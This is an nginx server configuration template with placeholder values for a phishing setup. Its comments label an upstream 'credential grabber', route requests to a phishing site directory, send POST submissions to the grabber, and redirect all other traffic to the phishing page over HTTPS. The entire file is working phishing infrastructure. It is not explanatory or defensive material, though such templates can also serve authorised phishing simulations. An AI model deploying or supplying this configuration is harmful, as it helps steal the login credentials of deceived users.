# Credential grabber upstream

upstream grabber {
	server <SERVER_HOST_IP (ex: 127.0.0.1:8080)> down;
}

# Redirect to HTTPS

server {
	listen 80 default_server;
	server_name <SERVER_NAME (ex: www.mydomain.com)>;
	return 301 https://$server_name$request_uri;
}

# HTTP server

server {

	# Define where Nginx is listening

	listen 443 default_server;
	server_name <SERVER_NAME (ex: www.mydomain.com)>;

	# SSL

	ssl on;
	ssl_certificate <SSL_CERT_PATH (ex: /etc/nginx/ssl/server.crt)>;
	ssl_certificate_key <SSL_KEY_PATH (ex: /etc/nginx/ssl/server.key)>;

	# Route requests to phishing site

	location <BASE_PHISHING_LOCATION (ex: /foo/bar/baz)> {
		index index.html;
		root <DOCUMENT_ROOT (ex: /var/www/html/mysite)>;
	}

	# Route POST request to credential grabber

	location <GRABBER_LOCATION (ex: /)> {
		proxy_set_header X-Real-IP $remote_addr;
		proxy_set_header Host $http_host;
		proxy_pass http://grabber;
	}

	# Route any other requests to redirect to phishing site

	location / {
		return 301 https://$server_name<BASE_PHISHING_LOCATION (ex: /foo/bar/baz)>;
	}

}